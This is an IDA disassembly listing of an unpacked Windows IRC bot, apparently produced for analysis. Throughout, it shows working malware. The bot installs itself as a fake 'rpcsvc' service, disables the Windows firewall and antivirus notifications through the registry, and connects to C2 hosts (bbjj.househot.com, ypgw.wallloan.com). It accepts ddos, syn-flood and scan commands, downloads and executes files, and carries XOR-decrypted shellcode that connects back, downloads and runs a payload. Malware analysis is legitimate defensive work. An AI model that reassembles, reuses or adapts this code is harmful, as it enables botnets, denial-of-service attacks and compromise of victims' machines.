;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 83D129BD1280F52A0B22B122C430637F
; File Name : u:\work\83d129bd1280f52a0b22b122c430637f_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write
MEW segment para public 'BSS' use32
assume cs:MEW
;org 401000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_401000 dd 77DE1EBDh ; DATA XREF: sub_402094+25�r
dword_401004 dd 77DDA20Bh ; DATA XREF: sub_402193+12�r
; sub_40224E+C�r ...
dword_401008 dd 77DDAB2Fh ; DATA XREF: sub_40224E+2B�r
; sub_402A81+248�r
dword_40100C dd 77E2C1B3h ; DATA XREF: sub_40224E+24�r
dword_401010 dd 77DE7E48h ; DATA XREF: sub_4022CE+2D�r
dword_401014 dd 77DE1356h ; DATA XREF: sub_4022CE+10�r
dword_401018 dd 77E2BC20h ; DATA XREF: sub_402A81+241�r
dword_40101C dd 77DE1291h ; DATA XREF: sub_402A81+22D�r
dword_401020 dd 77E2BF4Bh ; DATA XREF: sub_402193+4E�r
dword_401024 dd 77DD189Ah ; DATA XREF: sub_402A81+76�r
; sub_402A81+B5�r ...
dword_401028 dd 77DD59F0h ; DATA XREF: sub_402A81+62�r
dword_40102C dd 77DD72F0h ; DATA XREF: sub_402A81+44�r
dword_401030 dd 77DE27A1h ; DATA XREF: sub_402A81+3E�r
dword_401034 dd 77E2BE75h ; DATA XREF: sub_402193+54�r
dword_401038 dd 77DE8075h ; DATA XREF: sub_402193+B0�r
dword_40103C dd 77DE801Bh ; DATA XREF: sub_402193+23�r
; sub_40224E+1B�r ...
dd 0
dword_401044 dd 77E61A90h ; DATA XREF: sub_402CD9+95�r
; MEW:00405B04�o
dword_401048 dd 77E79824h ; DATA XREF: sub_402CD9+8F�r
dword_40104C dd 77E79CE3h ; DATA XREF: sub_402CD9+69�r
dword_401050 dd 77E73628h ; DATA XREF: sub_402CD9+3C�r
dword_401054 dd 77E77963h ; DATA XREF: sub_402CD9+2E�r
; sub_40443A+14C�r ...
dword_401058 dd 77E79D5Bh ; DATA XREF: sub_402CD9+1D�r
dword_40105C dd 77E7A5FDh ; DATA XREF: sub_402E88+15�r
; sub_40384E+25�r
dword_401060 dd 77E805D8h ; DATA XREF: sub_402E88+5�r
; sub_40384E+F�r
dword_401064 dd 77E7AC37h ; DATA XREF: sub_402EAA+E�r
; sub_402FC3+1A4�r ...
dword_401068 dd 77E77CC4h ; DATA XREF: sub_402F08+2�r
; sub_402F08:loc_402FA0�r ...
dword_40106C dd 77E74672h ; DATA XREF: sub_40325F+69�r
dword_401070 dd 77E7AA83h ; DATA XREF: sub_402CD9+D7�r
dword_401074 dd 77E96645h ; DATA XREF: sub_40325F+32�r
dword_401078 dd 77E78EAAh ; DATA XREF: sub_4032E0+10C�r
dword_40107C dd 77E75E67h ; DATA XREF: sub_4032E0+FD�r
dword_401080 dd 77E75D9Eh ; DATA XREF: sub_4032E0+23�r
dword_401084 dd 77E6AF8Fh ; DATA XREF: sub_4037CC+4B�r
dword_401088 dd 77E73803h ; DATA XREF: sub_403DA9+241�r
dword_40108C dd 77E736A3h ; DATA XREF: sub_403DA9+97�r
dword_401090 dd 77E668D9h ; DATA XREF: sub_4040DE+10D�r
dword_401094 dd 77E79D8Ch ; DATA XREF: sub_40443A+8D�r
dword_401098 dd 77E7A837h ; DATA XREF: sub_40443A+7B�r
; sub_4045CA+30�r
dword_40109C dd 77E79C90h ; DATA XREF: sub_402A81+37�r
; sub_402CD9+8�r
dword_4010A0 dd 77E705B0h ; DATA XREF: sub_402A81+1C3�r
dword_4010A4 dd 77E6D071h ; DATA XREF: sub_402A81+1EE�r
dword_4010A8 dd 77E6E32Eh ; DATA XREF: sub_402A81+1F5�r
dword_4010AC dd 77E61BB8h ; DATA XREF: sub_4027CB+66�r
; sub_402CD9+53�r ...
dword_4010B0 dd 77E76432h ; DATA XREF: sub_40258D+3F�r
; sub_4032E0+57�r ...
dword_4010B4 dd 77E7751Ah ; DATA XREF: sub_40230D+CF�r
; sub_40258D+C5�r ...
dword_4010B8 dd 77E7A099h ; DATA XREF: sub_40228C+C�r
dword_4010BC dd 77E73BEFh ; DATA XREF: sub_402193+92�r
; sub_4027CB+284�r ...
dword_4010C0 dd 77E704FCh ; DATA XREF: sub_40212C+D�r
dword_4010C4 dd 77E70396h ; DATA XREF: sub_40212C+2B�r
; sub_402A81+204�r
dword_4010C8 dd 77E6BD13h ; DATA XREF: sub_40212C+3B�r
dword_4010CC dd 77E7C2C4h ; DATA XREF: sub_4020D7+F�r
dword_4010D0 dd 77F5157Dh ; DATA XREF: sub_4020D7+19�r
dword_4010D4 dd 77E61BE6h ; DATA XREF: sub_4020D7+45�r
; sub_40212C+4A�r ...
dword_4010D8 dd 77E6C0E3h ; DATA XREF: sub_40325F+50�r
dword_4010DC dd 77E75CB5h ; DATA XREF: sub_4020D7+4F�r
; sub_402CD9+E�r
dd 0
dword_4010E4 dd 71B2ACCBh ; DATA XREF: sub_40465A�r
dword_4010E8 dd 71B2A381h ; DATA XREF: sub_404654�r
align 10h
dword_4010F0 dd 71A6B4E5h ; DATA XREF: sub_40464E�r MEW:00405FA0�o
align 8
dword_4010F8 dd 77D44B08h ; DATA XREF: sub_403185+20�r
dword_4010FC dd 77D651AFh ; DATA XREF: sub_40421C+39�r
; sub_40435D+2�r
dword_401100 dd 77D45CBCh ; DATA XREF: sub_40421C+33�r
; sub_40421C+59�r
dword_401104 dd 77D4702Fh ; DATA XREF: sub_40421C+1D�r
; sub_40435D+54�r ...
dword_401108 dd 77D4BDCAh ; DATA XREF: sub_40421C+D�r
dword_40110C dd 77D5BC10h ; DATA XREF: sub_40435D+73�r
dword_401110 dd 77D4C96Ah ; DATA XREF: sub_40212C+1F�r
; sub_40230D+D5�r ...
align 8
dword_401118 dd 71AB5A01h ; DATA XREF: sub_4040DE+8F�r
; sub_4040DE:loc_40419F�r
dword_40111C dd 71AB401Ch ; DATA XREF: sub_4027CB:loc_402A3A�r
; sub_403DA9+1CF�r ...
dword_401120 dd 71AB12F8h ; DATA XREF: sub_40258D+189�r
; sub_4034C1+62�r ...
dword_401124 dd 71AB2BBFh ; DATA XREF: sub_40230D+45�r
; sub_40258D+19A�r
dword_401128 dd 71AB3C22h ; DATA XREF: sub_40230D+85�r
; sub_402FC3+48�r ...
dword_40112C dd 71AB5DE2h ; DATA XREF: sub_4040DE+A9�r
dword_401130 dd 71AB3E5Dh ; DATA XREF: sub_40230D+B3�r
; sub_402FC3+FF�r ...
dword_401134 dd 71AB1AF4h ; DATA XREF: sub_40230D+B9�r
; sub_40254D+36�r ...
dword_401138 dd 71AB157Eh ; DATA XREF: sub_40230D+12A�r
; sub_4034C1+90�r ...
dword_40113C dd 71AB1890h ; DATA XREF: sub_40230D+14A�r
; sub_402FC3+12F�r
dword_401140 dd 71AB5690h ; DATA XREF: sub_40230D+192�r
; sub_403A7A+1B0�r ...
dword_401144 dd 71AB1A6Dh ; DATA XREF: sub_40230D+235�r
; sub_4027CB+EB�r ...
dword_401148 dd 71AB41DAh ; DATA XREF: sub_4020D7+35�r
dword_40114C dd 71AB868Dh ; DATA XREF: sub_4040DE+B2�r
dword_401150 dd 71AB3ECEh ; DATA XREF: sub_403DA9+54�r
; sub_4040DE+A1�r
dword_401154 dd 71AB14DCh ; DATA XREF: sub_403DA9+7A�r
dword_401158 dd 71AB1746h ; DATA XREF: sub_403DA9+E7�r
; sub_403DA9+10B�r
dword_40115C dd 71AB1746h ; DATA XREF: sub_4034C1+125�r
; sub_403A7A+F7�r ...
dword_401160 dd 71AB1ED3h ; DATA XREF: sub_4034C1+1B4�r
dword_401164 dd 71AB155Ah ; DATA XREF: sub_402FC3+5C�r
dword_401168 dd 71AB12A7h ; DATA XREF: sub_402FC3+DE�r
dword_40116C dd 71AB3F8Dh ; DATA XREF: sub_40230D+A1�r
; sub_4034C1+4C�r
dword_401170 dd 71AB1B7Bh ; DATA XREF: sub_404648�r
align 8
aCWindowsSystem db 'C:\WINDOWS\System32\rpcsvc.exe',0 ; DATA XREF: sub_40212C+2�o
; sub_402193+35�o
align 4
dd 39h dup(0)
dword_40127C dd 0 ; DATA XREF: sub_40230D+101�w
; sub_40258D+6B�w ...
dword_401280 dd 0 ; DATA XREF: sub_40230D+13�r
; sub_40230D+21�w ...
dword_401284 dd 0 ; DATA XREF: sub_40230D+5B�w
; sub_40258D+162�r ...
word_401288 dw 0 ; DATA XREF: sub_40230D+39�w
; sub_40230D+73�r
align 4
dword_40128C dd 0 ; DATA XREF: sub_40230D+55�w
; sub_40258D+B9�r ...
dword_401290 dd 80h dup(0) ; DATA XREF: sub_40230D+F7�o
; sub_40230D+108�o ...
dword_401490 dd 8 dup(0) ; DATA XREF: sub_40230D+E6�o
; sub_40230D+ED�o ...
dword_4014B0 dd 0 ; DATA XREF: sub_4033F9+98�w
; sub_4034B6�w ...
dword_4014B4 dd 0 ; DATA XREF: sub_4037CC+41�o
; sub_40443A+32�o
dword_4014B8 dd 0 ; DATA XREF: sub_403A36+34�r
; sub_403A7A+E3�w ...
dword_4014BC dd 0 ; DATA XREF: sub_40230D+99�w
; sub_40230D+AD�r ...
dword_4014C0 dd 0 ; DATA XREF: sub_40258D+192�w
; sub_40258D+1AB�w ...
dword_4014C4 dd 0 ; DATA XREF: sub_40230D+135�w
; sub_4027CB+277�r
dd 6 dup(0)
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_40212C+36�o
; sub_40228C+5�o ...
align 4
dd 41h dup(0)
aD: ; DATA XREF: sub_40228C+1B�o
; sub_40228C+2D�w ...
unicode 0, <D>,0
dd 0Ah dup(0)
dword_40162C dd 81h ; DATA XREF: sub_40228C+37�w
word_401630 dw 0 ; DATA XREF: sub_40228C+25�w
align 4
dd 7 dup(0)
dword_401650 dd 0 ; DATA XREF: sub_4027CB+4E�o
; sub_402CD9+14�o ...
align 10h
dword_401660 dd 32312E25h, 255C7338h, 7334362Eh, 0 ; DATA XREF: sub_40212C+19�o
dword_401670 dd 4B43694Eh, 312E2520h, 0A7336h ; DATA XREF: sub_40230D+F2�o
; sub_40258D+EA�o
dd 73382E25h, 78383025h, 0 ; DATA XREF: sub_40230D+E1�o
; sub_40258D+DC�o
dword_401688 dd 52655355h, 2 dup(6C206C20h), 0Ah ; DATA XREF: sub_40230D+C2�o
aPrivmsg_16s_48 db 'PRiVMSG %.16s :%.480s',0Ah,0 ; DATA XREF: sub_40254D+17�o
align 10h
aJoin_16s_16s db 'JOiN %.16s %.16s',0Ah,0 ; DATA XREF: sub_40258D+21C�o
align 4
aUserhost_16s db 'USeRHOST %.16s',0Ah,0 ; DATA XREF: sub_40258D+1E7�o
a001 db '001',0 ; DATA XREF: sub_40258D:loc_40274E�o
a302 db '302',0 ; DATA XREF: sub_40258D:loc_4026E3�o
a332 db '332',0 ; DATA XREF: sub_40258D:loc_402687�o
a433 db '433',0 ; DATA XREF: sub_40258D:loc_40263A�o
; sub_403CA4:loc_403CFF�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_40258D:loc_40260E�o
aPong_500s db 'PoNG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_40258D+58�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_40258D+45�o
; sub_403CA4+46�o
align 4
aNi_16s_16s db '[ni] %.16s %.16s',0 ; DATA XREF: sub_4027CB+29C�o
align 4
a_500s db '%.500s',0Ah,0 ; DATA XREF: sub_4027CB+1AA�o
; sub_403A36+1B�o
aQuit db 'QUiT',0Ah,0 ; DATA XREF: sub_4027CB+D4�o
align 4
aExec db '[exec] :(',0 ; DATA XREF: sub_4027CB:loc_402843�o
align 4
aExec_0 db '[exec] :)',0 ; DATA XREF: sub_4027CB+71�o
align 10h
aSharedaccess db 'sharedaccess',0 ; DATA XREF: sub_402A81+218�o
align 10h
aSDebugDcpromo_ db '%s\debug\dcpromo.log',0 ; DATA XREF: sub_402A81+1D0�o
align 4
aSoftwarePoli_0 db 'software\policies\microsoft\windowsfirewall\standardprofile',0
; DATA XREF: sub_402A81+18F�o
aEnablefirewall db 'enablefirewall',0 ; DATA XREF: sub_402A81+178�o
; sub_402A81+1A4�o
align 4
aSoftwarePolici db 'software\policies\microsoft\windowsfirewall\domainprofile',0
; DATA XREF: sub_402A81+163�o
align 10h
aFirewalldisa_0 db 'firewalldisableoverride',0 ; DATA XREF: sub_402A81+14C�o
aFirewalldisabl db 'firewalldisablenotify',0 ; DATA XREF: sub_402A81+139�o
align 10h
aAntivirusoverr db 'antivirusoverride',0 ; DATA XREF: sub_402A81+126�o
align 4
aAntivirusdisab db 'antivirusdisablenotify',0 ; DATA XREF: sub_402A81+113�o
align 4
aSoftwareMicr_0 db 'software\microsoft\security center',0 ; DATA XREF: sub_402A81+FE�o
align 10h
aAutosharewks db 'autosharewks',0 ; DATA XREF: sub_402A81+E7�o
align 10h
aAutoshareserve db 'autoshareserver',0 ; DATA XREF: sub_402A81+D4�o
aSystemCurren_0 db 'system\currentcontrolset\services\lanmanserver\parameters',0
; DATA XREF: sub_402A81+BF�o
align 4
aRestrictanon_0 db 'restrictanonymoussam',0 ; DATA XREF: sub_402A81+A8�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_402A81+95�o
align 4
aSystemCurrentc db 'system\currentcontrolset\control\lsa',0 ; DATA XREF: sub_402A81+80�o
align 10h
aEnabledcom db 'enabledcom',0 ; DATA XREF: sub_402A81+69�o
align 4
aN: ; DATA XREF: sub_402A81+5C�o
unicode 0, <n>,0
aSoftwareMicros db 'software\microsoft\ole',0 ; DATA XREF: sub_402A81+4E�o
align 4
loc_401948: ; DATA XREF: sub_402CD9+9E�o
jmp short loc_401977
; ---------------------------------------------------------------------------
loc_40194A: ; CODE XREF: MEW:loc_401977�p
push 0FFFFFFFFh
; ---------------------------------------------------------------------------
db 68h
dword_401950 dd 0FFFFFEFFh ; DATA XREF: sub_402CD9+7F�w
db 0B8h
dword_401955 dd 77E79D5Bh ; DATA XREF: sub_402CD9+29�w
db 0FFh, 0D0h, 68h
dword_40195C dd 0FFFFFFFFh ; DATA XREF: sub_402CD9+8A�w
db 0B8h
dword_401961 dd 77E77963h ; DATA XREF: sub_402CD9+37�w
db 0FFh, 0D0h, 0B8h
dword_401968 dd 77E73628h ; DATA XREF: sub_402CD9+48�w
dd 6AD0FFh
db 0B8h
dword_401971 dd 77E75CB5h ; DATA XREF: sub_402CD9+4D�w
; ---------------------------------------------------------------------------
call eax
loc_401977: ; CODE XREF: MEW:loc_401948�j
call loc_40194A
; ---------------------------------------------------------------------------
dd 0
dword_401980 dd 6C707865h, 7265726Fh, 6578652Eh, 0 ; DATA XREF: sub_402CD9+42�o
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_402E88+F�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_402E88�o
align 4
dword_4019B4 dd 1 ; DATA XREF: sub_402EAA�r
; sub_402EAA+23�w ...
aFindfile_256s_ db '[findfile] %.256s%.240s',0 ; DATA XREF: sub_4032E0+DE�o
a_256s_250s db '%.256s%.250s\',0 ; DATA XREF: sub_4032E0+9E�o
align 10h
a__ db '..',0 ; DATA XREF: sub_4032E0+82�o
align 4
a_: ; DATA XREF: sub_4032E0+70�o
; sub_4037CC+46�o
unicode 0, <.>,0
a_256s db '%.256s*',0 ; DATA XREF: sub_4032E0+1B�o
dd 1
aSyn_16sDoneUms db '[syn:%.16s] done [%ums] [%u packets] [%uMB] [%uK/s]',0
; DATA XREF: sub_4034C1+29C�o
aDl08xDl db '[dl:%08x] :( dl',0 ; DATA XREF: sub_40384E+126�o
aDl08xExec db '[dl:%08x] :( exec',0 ; DATA XREF: sub_40384E+114�o
align 4
aDl08x db '[dl:%08x] :)',0 ; DATA XREF: sub_40384E+E2�o
align 4
aDl08x_180sTo_1 db '[dl:%08x] %.180s to %.180s',0 ; DATA XREF: sub_40384E+7E�o
align 4
aUrldownloadtof db 'URLDownloadToFileA',0 ; DATA XREF: sub_40384E+1F�o
align 4
aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: sub_40384E+A�o
align 4
dword_401A98 dd 1 ; DATA XREF: sub_40399D+9�r
; sub_40399D+69�w ...
dword_401A9C dd 4B43494Eh, 312E2520h, 0A7336h ; DATA XREF: sub_403A7A+173�o
; sub_403CA4+A7�o
aUser_16s_16s_1 db 'USER %.16s "" "%.16s" %.16s',0Ah,0 ; DATA XREF: sub_403A7A+147�o
align 4
aPong_500s_0 db 'PONG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_403CA4+54�o
align 4
dword_401AD8 dd 1 ; DATA XREF: sub_403D7D�r
; sub_403D7D+15�w ...
a_16sHu_16sHu_2 db '[%.16s:%hu->%.16s:%hu] "%.256s"',0 ; DATA XREF: sub_403DA9+217�o
aJoin db 'JOIN #* *',0 ; DATA XREF: sub_403FF9+5D�o
align 4
aOper?? db 'OPER ?* ?* *',0 ; DATA XREF: sub_403FF9+56�o
align 4
aPass? db 'PASS ?* ',0 ; DATA XREF: sub_403FF9+4F�o
align 4
aUser? db 'USER ?* ',0 ; DATA XREF: sub_403FF9+48�o
align 10h
a?Ddos db '* :?*ddos* *',0 ; DATA XREF: sub_403FF9+41�o
align 10h
a?Udp db '* :?*udp* *',0 ; DATA XREF: sub_403FF9+3A�o
a?Syn db '* :?*syn* *',0 ; DATA XREF: sub_403FF9+33�o
a?Scan db '* :?*scan* *',0 ; DATA XREF: sub_403FF9+2C�o
align 4
a?set db '* :?set * * *',0 ; DATA XREF: sub_403FF9+25�o
align 4
a?login db '* :?login * *',0 ; DATA XREF: sub_403FF9+1E�o
align 4
aPrivmsg? db '*PRIVMSG * :?* *',0 ; DATA XREF: sub_403FF9+17�o
align 4
a_332? db '*:*.* 332 * #* :?* *',0 ; DATA XREF: sub_403FF9+A�o
align 4
aComspecQ db '"%comspec%" /Q',0 ; DATA XREF: sub_4040DE+ED�o
align 4
a_oscar_tree db '_Oscar_Tree',0 ; DATA XREF: sub_40421C+7C�o
a32770 db '#32770',0 ; DATA XREF: sub_40421C+40�o
; sub_40421C+60�o
align 4
a_oscar_statusn db '_Oscar_StatusNotify',0 ; DATA XREF: sub_40421C+8�o
a_oscar_iconbtn db '_Oscar_IconBtn',0 ; DATA XREF: sub_40435D:loc_4043C0�o
; sub_40435D+9D�o
align 4
aAte32class db 'Ate32Class',0 ; DATA XREF: sub_40435D+43�o
align 4
aCbclass db 'CBClass',0 ; DATA XREF: sub_40435D+35�o
aWndate32class db 'WndAte32Class',0 ; DATA XREF: sub_40435D+25�o
; sub_40435D+5B�o
align 10h
aAim_imessage db 'AIM_IMessage',0 ; DATA XREF: sub_40435D+10�o
; sub_40435D+B5�o
align 10h
aInstantMessage db 'Instant Message',0 ; DATA XREF: sub_40435D+9�o
; sub_40435D+B0�o
a_24sBrowser db '%.24s\browser',0 ; DATA XREF: sub_40443A+5E�o
align 10h
a_16sPipe db '\\%.16s\pipe',0 ; DATA XREF: sub_40443A+1F�o
align 10h
mov edx, 401180h
mov ecx, 0AE0h
call sub_401C7E
mov edx, offset byte_401C87
mov ecx, 29D9h
push offset sub_402094
; =============== S U B R O U T I N E =======================================
sub_401C7E proc near ; CODE XREF: MEW:00401C6A�p
; sub_401C7E+4�j
xor byte ptr [edx], 0CEh
inc edx
loop sub_401C7E
retn 8
sub_401C7E endp
; ---------------------------------------------------------------------------
byte_401C87 db 0 ; DATA XREF: MEW:00401C6F�o
aBbjj_househot_ db 'bbjj.househot.com',0 ; DATA XREF: sub_40230D+E�o
word_401C9A dw 9346h ; DATA XREF: sub_40230D+32�r
aYpgw_wallloan_ db 'ypgw.wallloan.com',0 ; DATA XREF: sub_40230D+21�o
word_401CAE dw 9346h ; DATA XREF: sub_40230D+1B�r
dword_401CB0 dd 387023h ; DATA XREF: sub_40254D+12�o
; sub_40258D+217�o ...
aIhodc9hi db 'ihodc9hi',0 ; DATA XREF: sub_40258D+212�o
align 10h
dword_401CC0 dd 12Ch ; DATA XREF: sub_40230D+145�r
dword_401CC4 dd 2D3870h ; DATA XREF: sub_40230D+DC�o
; sub_40258D+D2�o
byte_401CC8 db 2Eh ; DATA XREF: sub_40258D+130�r
byte_401CC9 db 21h ; DATA XREF: sub_40258D:loc_4026D3�r
align 4
dword_401CCC dd 6461212Ah, 406E696Dh, 696D6461h, 6Eh ; DATA XREF: sub_40258D+96�o
aRpcsvc_0 db 'rpcsvc',0 ; DATA XREF: sub_4020D7+6�o
align 4
aRpcsvc_exe db 'rpcsvc.exe',0 ; DATA XREF: sub_40212C+13�o
align 10h
aRpcsvc db 'rpcsvc',0 ; DATA XREF: sub_402094+15�o
; sub_402193+18�o ...
align 4
aWindowsRemoteP db 'Windows Remote Procedure Call Monitoring Service',0
; DATA XREF: sub_402193+47�o
align 4
aProvidesReliab db 'Provides reliability and uptime monitoring for components that us'
; DATA XREF: sub_402193+8C�o
db 'e the RPC subsystem. If this service is stopped, RPC communicatio'
db 'n between clients and servers on the network will be impaired. If'
db ' this service is disabled, any services that explicitly depend on'
db ' it will fail to start.',0
flt_401E48 dd 1.0e3 ; DATA XREF: sub_4034C1+280�r
; ---------------------------------------------------------------------------
loc_401E4C: ; DATA XREF: sub_40443A+100�o
jmp short loc_401E50
; ---------------------------------------------------------------------------
loc_401E4E: ; CODE XREF: MEW:loc_401E50�p
jmp short loc_401EBB
; ---------------------------------------------------------------------------
loc_401E50: ; CODE XREF: MEW:loc_401E4C�j
call loc_401E4E
push ebx
push ebp
push esi
push edi
mov ebp, [esp+18h]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_401E6E: ; CODE XREF: MEW:00401E8B�j
jecxz short loc_401EA2
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_401E79: ; CODE XREF: MEW:00401E85�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_401E87
ror edi, 0Dh
add edi, eax
jmp short loc_401E79
; ---------------------------------------------------------------------------
loc_401E87: ; CODE XREF: MEW:00401E7E�j
cmp edi, [esp+14h]
jnz short loc_401E6E
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_401EA4
; ---------------------------------------------------------------------------
loc_401EA2: ; CODE XREF: MEW:loc_401E6E�j
xor eax, eax
loc_401EA4: ; CODE XREF: MEW:00401EA0�j
pop edi
pop esi
pop ebp
pop ebx
mov [esp+4], eax
mov eax, [esp]
mov [esp+8], eax
mov eax, [esp+4]
add esp, 8
retn
; ---------------------------------------------------------------------------
loc_401EBB: ; CODE XREF: MEW:loc_401E4E�j
pop esi
push 30h
pop ecx
mov ebx, fs:[ecx]
mov ebx, [ebx+0Ch]
mov ebx, [ebx+1Ch]
mov ebx, [ebx]
mov edi, [ebx+8]
sub esp, 1Ch
mov ebp, esp
xor eax, eax
push eax
push 6578652Eh
mov [ebp+14h], esp
push edi
push 0E88A49EAh
call esi
push 6
push dword ptr [ebp+14h]
call eax
mov [ebp+4], eax
push edi
push 0E9238ADBh
call esi
mov [ebp+0Ch], eax
push edi
push 0EC0E4E8Eh
call esi
xor ecx, ecx
mov cx, 6C6Ch
push ecx
push 642E3233h
push 5F327377h
push esp
call eax
mov ebx, eax
push ebx
push 0E71819B6h
call esi
mov [ebp+10h], eax
push ebx
push 79C679E7h
call esi
mov [ebp+18h], eax
push ebx
push 492F0B6Eh
call esi
push 6
push 1
push 2
call eax
mov [ebp+8], eax
xor eax, eax
push eax
push eax
push eax
mov eax, 427FF02h
xor ah, 0FFh
push eax
mov eax, esp
push 10h
push eax
push dword ptr [ebp+8]
push ebx
push 0C7701AA4h
call esi
call eax
pop eax
push ebx
push 0E92EADA4h
call esi
push 10h
push dword ptr [ebp+8]
call eax
xor eax, eax
push eax
push eax
push dword ptr [ebp+8]
push ebx
push 498649E5h
call esi
call eax
mov ecx, [ebp+8]
mov [ebp+8], eax
push ecx
call dword ptr [ebp+18h]
add esp, 0FFFFFEFCh
mov ebx, esp
loc_401F94: ; CODE XREF: MEW:00401FAD�j
xor ecx, ecx
push ecx
mov cl, 0FFh
push ecx
push ebx
push dword ptr [ebp+8]
call dword ptr [ebp+10h]
test eax, eax
jle short loc_401FAF
push eax
push ebx
push dword ptr [ebp+4]
call dword ptr [ebp+0Ch]
jmp short loc_401F94
; ---------------------------------------------------------------------------
loc_401FAF: ; CODE XREF: MEW:00401FA3�j
push dword ptr [ebp+8]
call dword ptr [ebp+18h]
push edi
push 0DD1A4C5Bh
call esi
push dword ptr [ebp+4]
call eax
xor eax, eax
push eax
push dword ptr [ebp+14h]
push edi
push 0E8AFE98h
call esi
call eax
push edi
push 60E0CEEFh
call esi
call eax
; ---------------------------------------------------------------------------
dd 0
dword_401FE0 dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0 ; DATA XREF: sub_40443A+99�o
dd 1, 10000h, 8D9F4E40h, 11CEA03Dh, 8698Fh, 1B05303Eh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2
dword_402028 dd 3000005h, 10h, 83Ch, 1, 824h, 360000h, 11h, 0 ; DATA XREF: sub_40443A+D4�o
dd 11h, 4F0052h, 54004Fh, 53005Ch, 530059h, 450054h, 5C004Dh
dd 2 dup(300030h), 0
dd 0FFFFh, 7E0h, 2 dup(0)
dd 7C0h, 0
dword_402088 dd 7E0h, 4, 0 ; DATA XREF: sub_40443A+128�o
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402094 proc near ; DATA XREF: MEW:00401C79�o
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], offset sub_4022CE
mov [ebp+var_10], offset aRpcsvc ; "rpcsvc"
call sub_40228C
lea eax, [ebp+var_10]
push eax
call dword_401000 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_4020C8
call sub_40212C
loc_4020C8: ; CODE XREF: sub_402094+2D�j
call sub_4020D7
call nullsub_1
xor eax, eax
leave
retn
sub_402094 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4020D7 proc near ; CODE XREF: sub_402094:loc_4020C8�p
; sub_4022CE+33�p
var_19C = byte ptr -19Ch
sub esp, 190h
push offset aRpcsvc_0 ; "rpcsvc"
push 0
push 0
call dword_4010CC ; CreateMutexA
test eax, eax
jz short loc_402124
call dword_4010D0 ; RtlGetLastWin32Error
cmp eax, 0B7h
jz short loc_402124
call sub_402A81
lea eax, [esp+19Ch+var_19C]
push eax
push 101h
call dword_401148 ; WSAStartup
loc_402112: ; CODE XREF: sub_4020D7+4B�j
call sub_40230D
push 4000h
call dword_4010D4 ; Sleep
jmp short loc_402112
; ---------------------------------------------------------------------------
loc_402124: ; CODE XREF: sub_4020D7+17�j
; sub_4020D7+24�j
push 0
call dword_4010DC ; ExitProcess
sub_4020D7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40212C proc near ; CODE XREF: sub_402094+2F�p
push esi
push edi
mov esi, offset aCWindowsSystem ; "C:\\WINDOWS\\System32\\rpcsvc.exe"
push 104h
push esi
call dword_4010C0 ; GetSystemDirectoryA
push offset aRpcsvc_exe ; "rpcsvc.exe"
push esi
push offset dword_401660
push esi
call dword_401110 ; wsprintfA
add esp, 10h
push 20h
push esi
call dword_4010C4 ; SetFileAttributesA
xor edi, edi
loc_40215F: ; CODE XREF: sub_40212C+54�j
push 0
push esi
push offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
call dword_4010C8 ; CopyFileA
test eax, eax
jnz short loc_402182
push 1400h
call dword_4010D4 ; Sleep
inc edi
cmp edi, 5
jl short loc_40215F
loc_402182: ; CODE XREF: sub_40212C+43�j
call sub_402193
pop edi
pop esi
test eax, eax
jz short locret_402192
jmp sub_402CD9
; ---------------------------------------------------------------------------
locret_402192: ; CODE XREF: sub_40212C+5F�j
retn
sub_40212C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402193 proc near ; CODE XREF: sub_40212C:loc_402182�p
var_124 = byte ptr -124h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 124h
push ebx
push esi
